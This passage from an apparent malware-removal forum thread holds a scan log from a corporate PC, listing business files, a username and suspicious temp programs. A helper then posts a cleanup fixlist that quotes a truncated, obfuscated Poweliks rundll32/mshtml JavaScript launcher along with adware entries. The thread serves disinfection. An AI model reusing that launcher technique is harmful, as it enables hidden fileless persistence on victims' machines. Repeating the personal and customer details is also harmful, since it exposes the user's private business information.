2014-11-13 15:17 - 2014-11-13 15:17 - 00257536 _____ () C:\Users\hstagner\Downloads\454789R4 Sharp 15 mod XIVs.xls
2014-11-13 14:47 - 2014-11-13 14:47 - 00030208 _____ () C:\Users\hstagner\Downloads\121312 Account Win Plan 09-19-12 (2).xls
2014-11-13 13:22 - 2014-11-13 13:22 - 00091648 _____ () C:\Users\hstagner\Downloads\Paciolan Quote Worksheet_SF Draft_11Nov2014_INTERNAL.xls
2014-11-13 13:18 - 2014-11-13 13:18 - 00266752 _____ () C:\Users\hstagner\Downloads\CostCovrSales435992R00 (1).xls
2014-11-13 11:37 - 2014-11-13 11:37 - 00016024 _____ () C:\Users\hstagner\Downloads\thinkASG - Sharp - 454789r4 - 3YR 24x7.htm
2014-11-13 10:46 - 2014-11-13 10:46 - 00307200 _____ () C:\Users\hstagner\Downloads\DEAL SHEET _ DRAFT DOUG FRESH AND EASY P8 NOV 2014.xls
2014-11-13 10:45 - 2014-11-13 10:45 - 00282112 _____ () C:\Users\hstagner\Downloads\435992R1 Fresh and Easy.xls
2014-11-13 10:31 - 2014-11-13 10:31 - 00019641 _____ () C:\Users\hstagner\Downloads\thinkASG - Unknown - 435992r1 - 3YR 24x7.htm
2014-11-12 17:29 - 2014-11-12 17:29 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-11-12 15:35 - 2014-11-12 15:35 - 00015589 _____ () C:\Users\hstagner\Downloads\thinkASG - Waxie - 460250r0 - 3YR 24x7.htm
2014-11-12 13:56 - 2014-11-12 13:56 - 00586240 _____ () C:\Users\hstagner\Downloads\TOM GE M&C UPGRADE 9179 SN EFA9P 1 PROC 40GB 2014 VS 2015.xls
2014-11-12 13:56 - 2014-11-12 13:56 - 00585216 _____ () C:\Users\hstagner\Downloads\TOM GE M&C UPGRADE 9179s TO P7+ 2014 VS 2015.xls
2014-11-12 13:17 - 2014-11-12 13:17 - 00587264 _____ () C:\Users\hstagner\Downloads\DOUG OMNITRAC ADAM AND MILLY BUDGETARY purchase of 2015 vs 2014.xls
2014-11-12 12:37 - 2014-11-12 12:37 - 00182272 _____ () C:\Users\hstagner\Downloads\459679R0 Pharmavite N3150 sn 13-E0372.xls
2014-11-12 12:37 - 2014-11-12 12:37 - 00182272 _____ () C:\Users\hstagner\Downloads\459678R0 Pharmavite N3220 sn 13-60500.xls
2014-11-12 12:36 - 2014-11-12 12:36 - 00182272 _____ () C:\Users\hstagner\Downloads\459676R0 Pharmavite N3150 sn 13-E6466.xls
2014-11-12 12:31 - 2014-11-12 12:31 - 00182272 _____ () C:\Users\hstagner\Downloads\459677R0 Pharmavite N3150 sn 13E1607.xls
2014-11-12 11:15 - 2014-11-12 11:15 - 00016024 _____ () C:\Users\hstagner\Downloads\A8B7JX.htm
2014-11-12 11:13 - 2014-11-12 11:13 - 00308224 _____ () C:\Users\hstagner\Downloads\DOUG SHARP XIV 254TB X2 _SVC 500TB LIC OPTION NOV 2014 (1).xls
2014-11-12 10:36 - 2014-11-12 10:36 - 00225792 _____ () C:\Users\hstagner\Downloads\459824R1 9179 sn EFA9P proc and 40gb memory (1).xls
2014-11-12 10:08 - 2014-11-12 10:08 - 00053735 _____ () C:\Users\hstagner\Downloads\14315b1-02a SCSS - Omnitracs - P8 server for DEV (1).xlsx
2014-11-12 10:07 - 2014-11-12 10:07 - 00053735 _____ () C:\Users\hstagner\Downloads\14315b1-02a SCSS - Omnitracs - P8 server for DEV.xlsx
2014-11-12 09:01 - 2014-11-12 09:01 - 00053268 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (31).xlsx
2014-11-11 15:33 - 2014-11-11 15:33 - 00032860 _____ () C:\Users\hstagner\Downloads\thinkASG - Sharp - 454789r1 - 3YR 24x7 (1).htm
2014-11-11 15:06 - 2014-11-11 15:06 - 00307712 _____ () C:\Users\hstagner\Downloads\DOUG SHARP XIV 254TB X2 _SVC 500TB LIC OPTION NOV 2014.xls
2014-11-11 15:06 - 2014-11-11 15:06 - 00257536 _____ () C:\Users\hstagner\Downloads\454789R2 Sharp XIV and SVC.xls
2014-11-11 14:19 - 2014-11-11 14:19 - 00053917 _____ () C:\Users\hstagner\Downloads\14315b1-01a SCSS - Omnitracs - P8 server for DEV.xlsx
2014-11-11 12:39 - 2014-11-11 12:39 - 00196096 _____ () C:\Users\hstagner\Downloads\457694R0 Linux inject for Omnitracs.xls
2014-11-11 10:03 - 2014-11-11 10:03 - 00306688 _____ () C:\Users\hstagner\Downloads\DEAL SHEET _DRAFT _DOUG OMNITRAC ADAM AND MILLY BUDGETARY AUG 2014 (3).xls
2014-11-11 09:58 - 2014-11-11 09:58 - 00306688 _____ () C:\Users\hstagner\Downloads\DEAL SHEET _DRAFT _DOUG OMNITRAC ADAM AND MILLY BUDGETARY AUG 2014 (2).xls
2014-11-11 09:35 - 2014-11-11 09:35 - 00306176 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT_ TOM GE M&C UPGRADE 9179 SN EFA9P 1 PROC 40GB NOV 2014 (1).xls
2014-11-10 16:39 - 2014-11-10 16:39 - 00014161 _____ () C:\Users\hstagner\Downloads\459824r1 ANB0G3 - spec change for 9179 sn#efa9p.htm
2014-11-10 16:38 - 2014-11-10 16:38 - 00305664 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT_ TOM GE M&C UPGRADE 9179 SN EFA9P 1 PROC 40GB NOV 2014.xls
2014-11-10 16:38 - 2014-11-10 16:38 - 00234496 _____ () C:\Users\hstagner\Downloads\459824R1 9179 sn EFA9P proc and 40gb memory.xls
2014-11-10 13:44 - 2014-11-10 13:44 - 00299520 _____ () C:\Users\hstagner\Downloads\449261R7 Omnitracs 4way (2).xls
2014-11-10 11:54 - 2014-11-10 11:54 - 00178176 _____ () C:\Users\hstagner\Downloads\sales_quote_1107TSS04 (1).xls
2014-11-10 11:51 - 2014-11-10 11:51 - 00178176 _____ () C:\Users\hstagner\Downloads\sales_quote_1107TSS04.xls
2014-11-07 17:05 - 2014-11-07 17:05 - 00305664 _____ () C:\Users\hstagner\Downloads\DOUG SHARP XIV AND SVC OPTION NOV 2014.xls
2014-11-07 16:59 - 2014-11-07 16:59 - 00032860 _____ () C:\Users\hstagner\Downloads\thinkASG - Sharp - 454789r1 - 3YR 24x7.htm
2014-11-07 16:44 - 2014-11-07 16:44 - 01977344 _____ () C:\Users\hstagner\Downloads\TOM GE dealsheets for Dec 2013 to Nov 2014.xls
2014-11-07 13:13 - 2014-11-07 13:13 - 00111107 _____ () C:\Users\hstagner\Downloads\ANB4JC (4).htm
2014-11-07 12:44 - 2014-11-07 12:44 - 00012819 _____ () C:\Users\hstagner\Downloads\AZB604 (2).htm
2014-11-06 11:48 - 2014-11-06 11:48 - 00111107 _____ () C:\Users\hstagner\Downloads\ANB4JC (3).htm
2014-11-06 10:29 - 2014-11-06 10:29 - 00299520 _____ () C:\Users\hstagner\Downloads\449261R7 Omnitracs 4way (1).xls
2014-11-06 10:18 - 2014-11-06 10:18 - 00305664 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT_ TOM GE M&C PROTECTTIER UPGRADE NOV 2014 (1).xls
2014-11-06 10:16 - 2014-11-06 10:16 - 00106428 _____ () C:\Users\hstagner\Downloads\ANB4JC (2).htm
2014-11-06 10:14 - 2014-11-06 10:14 - 00106428 _____ () C:\Users\hstagner\Downloads\ANB4JC (1).htm
2014-11-06 10:14 - 2014-11-06 10:14 - 00012819 _____ () C:\Users\hstagner\Downloads\AZB604.htm
2014-11-06 10:14 - 2014-11-06 10:14 - 00012819 _____ () C:\Users\hstagner\Downloads\AZB604 (1).htm
2014-11-06 09:53 - 2014-11-06 09:53 - 00425324 _____ () C:\Users\hstagner\Downloads\vm-20141105193722062714-ccbd0e6a5d6d36593b9a8a8749215aad.wav
2014-11-06 08:01 - 2014-11-06 08:01 - 00000000 ____D () C:\Users\Default\AppData\Local\Google
2014-11-06 08:01 - 2014-11-06 08:01 - 00000000 ____D () C:\Users\Default User\AppData\Local\Google
2014-11-05 08:31 - 2014-11-05 08:31 - 00046596 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (30).xlsx
2014-11-04 16:59 - 2014-11-04 17:00 - 00012819 _____ () C:\Users\hstagner\Downloads\ANB4JC.htm
2014-11-04 13:48 - 2014-11-04 13:48 - 00201216 _____ () C:\Users\hstagner\Downloads\457273R0 GE M&C Alph.xls
2014-11-04 13:44 - 2014-11-04 13:44 - 00209408 _____ () C:\Users\hstagner\Downloads\457272R0 GE M&C Mason PTT.xls
2014-11-04 13:44 - 2014-11-04 13:44 - 00209408 _____ () C:\Users\hstagner\Downloads\457272R0 GE M&C Mason PTT (1).xls
2014-11-04 13:43 - 2014-11-04 13:43 - 00305152 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT_ TOM GE M&C PROTECTTIER UPGRADE NOV 2014.xls
2014-11-04 11:09 - 2014-11-04 11:09 - 00312135 _____ () C:\Users\hstagner\Downloads\11-3-14 ASG- Petco Animal Supplies.xlsx
2014-11-03 16:55 - 2014-11-03 16:55 - 00242124 _____ () C:\Users\hstagner\Downloads\vm-20141103215500017350-ccbd0e6a5d6d36593b9a8a8749215aad.wav
2014-11-03 14:29 - 2014-11-03 14:29 - 00011149 _____ () C:\Users\hstagner\Downloads\ASG - GE - Replacement SVCs - Merge to A5BVG6  (2).htm
2014-11-03 10:30 - 2014-11-03 10:30 - 00037586 _____ () C:\Users\hstagner\Downloads\thinkASG - Sharp - 458049r2 - 3YR 24x7.htm
2014-11-03 10:20 - 2014-11-03 10:20 - 00017901 _____ () C:\Users\hstagner\Downloads\thinkASG - Sonic - 458008r0 - 3YR 24x7.htm
2014-11-03 09:23 - 2014-11-03 09:24 - 00049337 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (29).xlsx
2014-10-31 15:26 - 2014-10-31 15:26 - 00309760 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT DOUG SHARP SVC_v7000_v840 NOV 2014.xls
2014-10-31 15:02 - 2014-10-31 15:02 - 00003273 _____ () C:\Users\hstagner\Downloads\isat.jnlp
2014-10-31 12:22 - 2014-10-31 12:22 - 00011149 _____ () C:\Users\hstagner\Downloads\ASG - GE - Replacement SVCs - Merge to A5BVG6  (1).htm
2014-10-31 11:50 - 2014-10-31 11:50 - 00336896 _____ () C:\Users\hstagner\Downloads\GE 820_Relo Form.xls
2014-10-30 14:27 - 2014-10-30 14:27 - 00010755 _____ () C:\Users\hstagner\Downloads\Garner Travel Information.xlsx
2014-10-30 13:54 - 2014-10-30 13:54 - 00330752 _____ () C:\Users\hstagner\Downloads\GE 820 thinkASG_2011_Relocation_Form (2).xls
2014-10-30 13:43 - 2014-10-30 13:43 - 00330752 _____ () C:\Users\hstagner\Downloads\GE 820 thinkASG_2011_Relocation_Form (1).xls
2014-10-30 11:40 - 2014-10-30 11:40 - 00297984 _____ () C:\Users\hstagner\Downloads\449261R7 Omnitracs 4way.xls
2014-10-30 08:52 - 2014-10-30 08:53 - 00305664 _____ () C:\Users\hstagner\Downloads\DEAL SHEET _DRAFT _DOUG OMNITRAC ADAM AND MILLY BUDGETARY AUG 2014 (1).xls
2014-10-30 08:04 - 2014-10-30 08:04 - 00010446 _____ () C:\Users\hstagner\Downloads\Travel Information Template (1).xlsx
2014-10-29 16:37 - 2014-10-29 16:37 - 00010446 _____ () C:\Users\hstagner\Downloads\Travel Information Template.xlsx
2014-10-29 16:31 - 2014-10-29 16:31 - 08387494 _____ () C:\Users\hstagner\Downloads\mds-shellshock-1.0.gz
2014-10-29 09:57 - 2014-10-29 09:57 - 00238691 _____ () C:\Users\hstagner\Downloads\10-28-14 ASG- Omnitracs.xlsx
2014-10-29 09:49 - 2014-10-29 09:49 - 00238516 _____ () C:\Users\hstagner\Downloads\10-27-14 ASG- Omnitracs (1).xlsx
2014-10-29 08:51 - 2014-10-29 08:51 - 00316928 _____ () C:\Users\hstagner\Downloads\CostCovrSales449261R07.xls
2014-10-28 16:21 - 2014-10-28 16:21 - 00330752 _____ () C:\Users\hstagner\Downloads\GE 820 thinkASG_2011_Relocation_Form.xls
2014-10-28 14:44 - 2014-10-28 14:44 - 00095884 _____ () C:\Users\hstagner\Downloads\vm-20141028193652016455-ccbd0e6a5d6d36593b9a8a8749215aad.wav
2014-10-28 09:15 - 2014-10-28 09:15 - 00013676 _____ () C:\Users\hstagner\Downloads\AM0W01 8x5.htm
2014-10-28 09:14 - 2014-10-28 09:14 - 00019558 _____ () C:\Users\hstagner\Downloads\AM0W01.htm
2014-10-28 08:04 - 2014-10-28 08:04 - 00049782 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (28).xlsx
2014-10-27 15:31 - 2014-10-27 15:31 - 00318464 _____ () C:\Users\hstagner\Downloads\CostCovrSales449261R06 (2).xls
2014-10-27 15:13 - 2014-10-27 15:13 - 00310784 _____ () C:\Users\hstagner\Downloads\DOUG Omnitracs small p8 vs upgrade to free machine Sept 2014 (4).xls
2014-10-27 14:29 - 2014-10-27 14:29 - 00318464 _____ () C:\Users\hstagner\Downloads\CostCovrSales449261R06 (1).xls
2014-10-27 13:48 - 2014-10-27 13:49 - 00020600 _____ () C:\Users\hstagner\Downloads\APBFQ9 (4).htm
2014-10-27 13:10 - 2014-10-27 13:10 - 00308736 _____ () C:\Users\hstagner\Downloads\DOUG Omnitracs small p8 vs upgrade to free machine Sept 2014 (3).xls
2014-10-27 13:07 - 2014-10-27 13:07 - 00252416 _____ () C:\Users\hstagner\Downloads\10-27-14 ASG- Omnitracs.xls
2014-10-27 13:06 - 2014-10-27 13:06 - 00238516 _____ () C:\Users\hstagner\Downloads\10-27-14 ASG- Omnitracs.xlsx
2014-10-27 12:16 - 2014-10-27 12:16 - 00183296 _____ () C:\Users\hstagner\Downloads\CostCovrSales457164R00.xls
2014-10-27 12:06 - 2014-10-27 12:06 - 00317952 _____ () C:\Users\hstagner\Downloads\CostCovrSales449261R06.xls
2014-10-27 11:02 - 2014-10-27 11:02 - 00187244 _____ () C:\Users\hstagner\Downloads\vm-20141027160227064355-ccbd0e6a5d6d36593b9a8a8749215aad (1).wav
2014-10-27 11:01 - 2014-10-27 11:01 - 00187244 _____ () C:\Users\hstagner\Downloads\vm-20141027160227064355-ccbd0e6a5d6d36593b9a8a8749215aad.wav
2014-10-27 09:12 - 2014-10-27 09:12 - 00315392 _____ () C:\Users\hstagner\Downloads\CostCovrSales449261R04.xls
2014-10-24 11:09 - 2014-10-24 11:09 - 00019689 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (27).xlsx
2014-10-23 11:51 - 2014-11-14 11:02 - 00000000 ___RD () C:\Users\hstagner\Google Drive
2014-10-23 11:51 - 2014-10-23 11:51 - 00001675 _____ () C:\Users\hstagner\Desktop\Google Drive.lnk
2014-10-23 11:50 - 2014-11-06 08:01 - 00002053 _____ () C:\Users\Public\Desktop\Google Slides.lnk
2014-10-23 11:50 - 2014-11-06 08:01 - 00002051 _____ () C:\Users\Public\Desktop\Google Sheets.lnk
2014-10-23 11:50 - 2014-11-06 08:01 - 00002041 _____ () C:\Users\Public\Desktop\Google Docs.lnk
2014-10-23 11:50 - 2014-11-06 08:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2014-10-23 10:59 - 2014-10-23 10:59 - 00229888 _____ () C:\Users\hstagner\Downloads\455735R0 GE power8 server (1).xls
2014-10-23 10:46 - 2014-10-23 10:46 - 00308224 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT _TOM GE M&C SVC and V840 SEPT_ OCT 2014 (5).xls
2014-10-23 09:48 - 2014-10-23 09:48 - 00036323 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (26).xlsx
2014-10-23 09:48 - 2014-10-23 09:48 - 00025403 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (25).xlsx
2014-10-23 09:47 - 2014-10-23 09:47 - 00019440 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (24).xlsx
2014-10-22 17:04 - 2014-10-22 17:04 - 00054049 _____ () C:\Users\hstagner\Downloads\14295b1-01a SCSS - GE - DEV SVC & Flash.xlsx
2014-10-22 16:12 - 2014-10-22 16:12 - 00023080 _____ () C:\Users\hstagner\Downloads\GE_450525r0_AP9LJ3 (1).htm
2014-10-22 16:11 - 2014-10-22 16:11 - 00033517 _____ () C:\Users\hstagner\Downloads\GE_450526r0_AN9LJ8.htm
2014-10-22 16:11 - 2014-10-22 16:11 - 00023080 _____ () C:\Users\hstagner\Downloads\GE_450525r0_AP9LJ3.htm
2014-10-22 16:06 - 2014-10-22 16:06 - 00023080 _____ () C:\Users\hstagner\Downloads\450525r1_AP9LJ3 GE maint (1).htm
2014-10-22 15:11 - 2014-10-22 15:11 - 00202752 _____ () C:\Users\hstagner\Downloads\CostCovrSales430756R02.xls
2014-10-22 14:54 - 2014-10-22 14:54 - 00312320 _____ () C:\Users\hstagner\Downloads\Tech Data Contact Sheet 2014.ppt
2014-10-22 14:30 - 2014-10-22 14:30 - 00185856 _____ () C:\Users\hstagner\Downloads\CostCovrSales456652R00.xls
2014-10-22 12:59 - 2014-10-28 12:02 - 00000000 ____D () C:\Users\hstagner\AppData\Local\WebEx
2014-10-22 12:58 - 2014-10-22 12:58 - 00631744 _____ (Cisco WebEx LLC) C:\Users\hstagner\Downloads\Cisco_WebEx_Add-On.exe
2014-10-22 11:42 - 2014-10-22 11:43 - 00182784 _____ () C:\Users\hstagner\Downloads\CostCovrSales454950R00 (2).xls
2014-10-22 11:11 - 2014-10-22 11:11 - 00000000 _____ () C:\DAC_ELIST
2014-10-22 09:01 - 2014-10-22 09:01 - 00308289 _____ () C:\Users\hstagner\Downloads\10-21-14 ASG- Omnitracs (1).xlsx
2014-10-21 15:44 - 2014-10-21 15:45 - 00308224 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT _TOM GE M&C SVC and V840 SEPT_ OCT 2014 (4).xls
2014-10-21 14:53 - 2014-10-21 14:53 - 00308289 _____ () C:\Users\hstagner\Downloads\10-21-14 ASG- Omnitracs.xlsx
2014-10-21 14:40 - 2014-10-21 14:40 - 00212992 _____ () C:\Users\hstagner\Downloads\CostCovrSales456188R01.xls
2014-10-21 13:48 - 2014-10-21 13:48 - 00187392 _____ () C:\Users\hstagner\Downloads\CostCovrSales454950R00 (1).xls
2014-10-21 13:45 - 2014-10-21 13:45 - 00187392 _____ () C:\Users\hstagner\Downloads\CostCovrSales454950R00.xls
2014-10-21 08:48 - 2014-10-21 08:48 - 00185856 _____ () C:\Users\hstagner\Downloads\CostCovrSales456052R00.xls
2014-10-21 08:16 - 2014-10-21 08:16 - 00240640 _____ () C:\Users\hstagner\Downloads\CostCovrSales455735R00 (1).xls
2014-10-20 15:33 - 2014-10-20 15:33 - 00325644 _____ () C:\Users\hstagner\Downloads\vm-20141020203250064089-ccbd0e6a5d6d36593b9a8a8749215aad.wav
2014-10-20 12:30 - 2014-10-20 12:30 - 00305152 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT _DOUG OMNITRACS UPGRADE TO XIV OCT 2014.xls
2014-10-20 10:31 - 2014-10-20 10:31 - 01049088 _____ () C:\Users\hstagner\Downloads\BP Offering Release 47P Education 10.22.2014..ppt
2014-10-20 09:51 - 2014-10-20 09:51 - 00240640 _____ () C:\Users\hstagner\Downloads\CostCovrSales455735R00.xls
2014-10-17 13:59 - 2014-10-17 13:59 - 00305152 _____ () C:\Users\hstagner\Downloads\DOUG OMNITRACS UPGRADE TO XIV OCT 2014.xls
2014-10-17 13:59 - 2014-10-17 13:59 - 00183808 _____ () C:\Users\hstagner\Downloads\454899R0 Omnitracs XIV upgrade.xls
2014-10-17 13:13 - 2014-10-17 13:13 - 00034304 _____ () C:\Users\hstagner\Downloads\timeoffhstagner (1).xls
2014-10-17 09:45 - 2014-10-17 09:45 - 00276480 _____ () C:\Users\hstagner\Downloads\GE M&C IVO VS BID PRICING ON SVC_FLASH_POWER OCT 2014.xls
2014-10-17 08:22 - 2014-10-17 08:22 - 00011149 _____ () C:\Users\hstagner\Downloads\ASG - GE - Replacement SVCs - Merge to A5BVG6 .htm
2014-10-16 15:44 - 2014-10-16 15:44 - 00307712 _____ () C:\Users\hstagner\Downloads\DEAL SHEET DRAFT _TOM GE M&C SVC and V840 SEPT_ OCT 2014 (3).xls
2014-10-16 15:38 - 2014-10-16 15:38 - 00230400 _____ () C:\Users\hstagner\Downloads\455735R0 GE power8 server.xls
2014-10-16 15:32 - 2014-10-16 15:32 - 00314880 _____ () C:\Users\hstagner\Downloads\DEAL SHEET_ DRAFT TOM GE M&C STORAGE JULY 2014 PHASE 2.xls
2014-10-16 15:28 - 2014-10-16 15:28 - 00015097 _____ () C:\Users\hstagner\Downloads\thinkASG - GE - 455735r0 - 3YR 24x7.htm
2014-10-16 13:43 - 2014-10-16 13:44 - 00185856 _____ () C:\Users\hstagner\Downloads\455681R0 GE SVC upgrade.xls
2014-10-16 11:06 - 2014-10-16 11:06 - 00238678 _____ () C:\Users\hstagner\Downloads\10-15-14 ASG- Omnitracs (2).xlsx
2014-10-16 08:25 - 2014-10-16 08:25 - 00019070 _____ () C:\Users\hstagner\Downloads\Backlog Report - ADVANCED SYSTEMS GROUP (23).xlsx
2014-10-15 16:23 - 2014-10-15 16:24 - 00238678 _____ () C:\Users\hstagner\Downloads\10-15-14 ASG- Omnitracs (1).xlsx
2014-10-15 16:13 - 2014-10-15 16:13 - 00238678 _____ () C:\Users\hstagner\Downloads\10-15-14 ASG- Omnitracs.xlsx
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-14 12:51 - 2011-12-09 17:00 - 00000000 ____D () C:\ProgramData\TEMP
2014-11-14 12:47 - 2011-12-10 05:44 - 00000466 _____ () C:\Windows\Tasks\SystemToolsDailyTest.job
2014-11-14 12:44 - 2011-10-04 15:03 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-14 12:43 - 2012-04-11 15:39 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-14 12:43 - 2011-12-10 05:44 - 00000528 _____ () C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2014-11-14 12:42 - 2014-06-30 13:39 - 00000000 ____D () C:\Windows\SysWOW64\aamdata
2014-11-14 12:42 - 2012-04-26 10:27 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-11-14 12:09 - 2012-11-08 16:54 - 00000920 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131UA.job
2014-11-14 11:53 - 2014-05-07 15:26 - 00000580 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2926875163-4226794389-2330185411-1131.job
2014-11-14 11:35 - 2014-03-24 10:58 - 00023196 _____ () C:\Windows\TMFilter.log
2014-11-14 11:08 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-14 11:08 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-14 11:06 - 2009-07-14 00:13 - 01081288 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-14 11:04 - 2012-01-26 13:13 - 00000000 ____D () C:\Users\hstagner\AppData\Local\Digsby
2014-11-14 11:04 - 2011-10-04 15:01 - 01159220 _____ () C:\Windows\WindowsUpdate.log
2014-11-14 11:02 - 2011-10-04 15:03 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-14 11:01 - 2012-01-25 14:19 - 00000000 ____D () C:\adsm.sys
2014-11-14 11:00 - 2012-05-21 11:52 - 00054510 _____ () C:\Windows\setupact.log
2014-11-14 11:00 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-14 09:09 - 2012-11-08 16:54 - 00000868 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131Core.job
2014-11-14 07:39 - 2011-10-04 15:03 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-11-14 07:39 - 2011-10-04 15:03 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-11-13 09:04 - 2012-11-08 16:54 - 00003896 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131UA
2014-11-13 09:04 - 2012-11-08 16:54 - 00003500 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2926875163-4226794389-2330185411-1131Core
2014-11-04 14:30 - 2010-11-20 22:27 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-29 08:48 - 2014-05-07 15:26 - 00003604 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-2926875163-4226794389-2330185411-1131
2014-10-28 12:20 - 2012-01-26 12:44 - 00000000 __SHD () C:\Users\hstagner\Documents\cache
2014-10-28 12:02 - 2012-04-06 10:31 - 00000000 ____D () C:\ProgramData\WebEx
2014-10-25 14:51 - 2013-03-25 11:18 - 00000000 _____ () C:\Windows\system32\DAC_ELIST
2014-10-23 11:51 - 2012-01-26 12:08 - 00000000 ____D () C:\Users\hstagner
2014-10-23 11:50 - 2012-01-26 12:50 - 00000000 ____D () C:\Users\hstagner\AppData\Local\Google
2014-10-23 11:50 - 2011-10-04 15:03 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-21 15:41 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-20 13:33 - 2013-09-19 11:05 - 00000000 ____D () C:\Program Files\CrashPlan
 
Some content of TEMP:
====================
C:\Users\hstagner\AppData\Local\Temp\Couponscom.exe
C:\Users\hstagner\AppData\Local\Temp\DefaultPack.exe
C:\Users\jmccullough\AppData\Local\Temp\ose00000.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-11-07 08:58
 
==================== End Of Log ============================
 
#2 nasdaq
 
  • Malware Response Team
  • 40,213 posts
  • Gender:Male
  • Location:Montreal, QC. Canada
 
Posted 19 November 2014 - 09:29 AM

 
Open Notepad (Start => All Programs => Accessories => Notepad). Please copy the entire contents of the code box below.
 
 
start
 
(Coupons.com Inc.) C:\Program Files (x86)\Coupons\CouponPrinterService.exe
HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO-x32: TBSB07898 Class -> {FCBCCB87-9224-4B8D-B117-F56D924BEB18} -> C:\Program Files (x86)\Coupons.com CouponBar\tbcore3.dll ()
Toolbar: HKLM-x32 - Coupons.com CouponBar - {8660E5B3-6C41-44DE-8503-98D99BBECD41} - C:\Program Files (x86)\Coupons.com CouponBar\tbcore3.dll ()
FF Keyword.URL: hxxp://www.bing.com/search?FORM=U079DF&PC=U079&q=
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll (Coupons, Inc.)
FF SearchPlugin: C:\Users\hstagner\AppData\Roaming\Mozilla\Firefox\Profiles\wzygs4sr.default-1398197978032\searchplugins\bingp.xml
FF HKLM-x32\...\Firefox\Extensions: [{1C43BAF1-00C2-40A8-A09E-F84CFD79546D}] - C:\Program Files (x86)\Coupons.com CouponBar\firefox\{1C43BAF1-00C2-40A8-A09E-F84CFD79546D}\Coupons.com.xpi
FF Extension: Coupons.com CouponBar - C:\Program Files (x86)\Coupons.com CouponBar\firefox\{1C43BAF1-00C2-40A8-A09E-F84CFD79546D}\Coupons.com.xpi [2014-03-12]
CHR Extension: (Coupons.com Toolbar) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpkmcjgpcihgfnkcjapiaabbbplkcmf [2014-05-15]
